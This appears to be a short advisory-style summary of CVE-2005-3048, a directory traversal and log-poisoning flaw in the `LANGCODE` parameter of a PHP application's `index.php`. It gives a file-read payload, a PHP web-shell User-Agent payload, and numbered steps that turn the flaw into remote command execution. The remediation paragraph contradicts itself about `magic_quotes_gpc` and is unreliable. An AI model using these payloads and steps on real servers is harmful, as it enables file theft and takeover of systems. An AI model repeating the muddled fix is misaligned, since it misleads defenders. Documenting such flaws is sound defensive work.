CVE-2005-3048

An attacker sends a crafted HTTP request to `index.php` with a `LANGCODE` parameter containing `../` sequences (e.g., `/../../../../etc/passwd%00`) to read arbitrary files. For code execution, the attacker first sends a request with a malicious `User-Agent` header containing PHP code (e.g., `<?php system($HTTP_GET_VARS[cmd]) ?>`), which is stored in the server's tracking log file. A second request then uses the `LANGCODE` parameter to include that log file (e.g., `LANGCODE=/../../data/tracking[date]%00`) and passes a command via the `cmd` parameter, achieving remote command execution [ref_id=1].

The vulnerability resides in `index.php`, which uses the `LANGCODE` parameter in an include or file-read operation without sanitizing directory traversal sequences. The advisory also identifies the user-tracking data file stored under `data/tracking[date]` as the vehicle for code injection [ref_id=1].

The advisory does not include a patch or official fix. It recommends that users disable `magic_quotes_gpc` if it is off, but this is a workaround, not a remediation. No vendor patch is referenced in the provided bundle [ref_id=1].

1. Send a request to `index.php` with a malicious `User-Agent` header containing PHP code, e.g., `User-Agent: <?php system($HTTP_GET_VARS[cmd]) ?><?php die ?>`. 2. Note the current date in `dmY` format (e.g., `22092005`). 3. Send a second request to `index.php?cmd=ls%20-la&LANGCODE=/../../data/tracking[date]%00` (replace `[date]` with the actual date). The server will include the tracking log file and execute the injected PHP code with the `cmd` parameter [ref_id=1].